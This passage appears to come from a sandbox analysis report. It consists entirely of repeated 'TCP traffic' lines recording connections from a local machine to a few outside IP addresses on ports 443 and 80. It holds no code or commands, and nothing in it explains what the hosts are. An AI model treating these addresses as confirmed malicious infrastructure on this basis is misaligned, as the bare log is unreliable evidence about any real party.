          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49805 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49806 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49808 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49811 -> 188.114.96.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49814 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49816 -> 188.114.97.3:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49818 -> 149.154.167.220:443
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 147.124.216.113:80
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
          Source: global trafficTCP traffic: 147.124.216.113:80 -> 192.168.2.4:49739
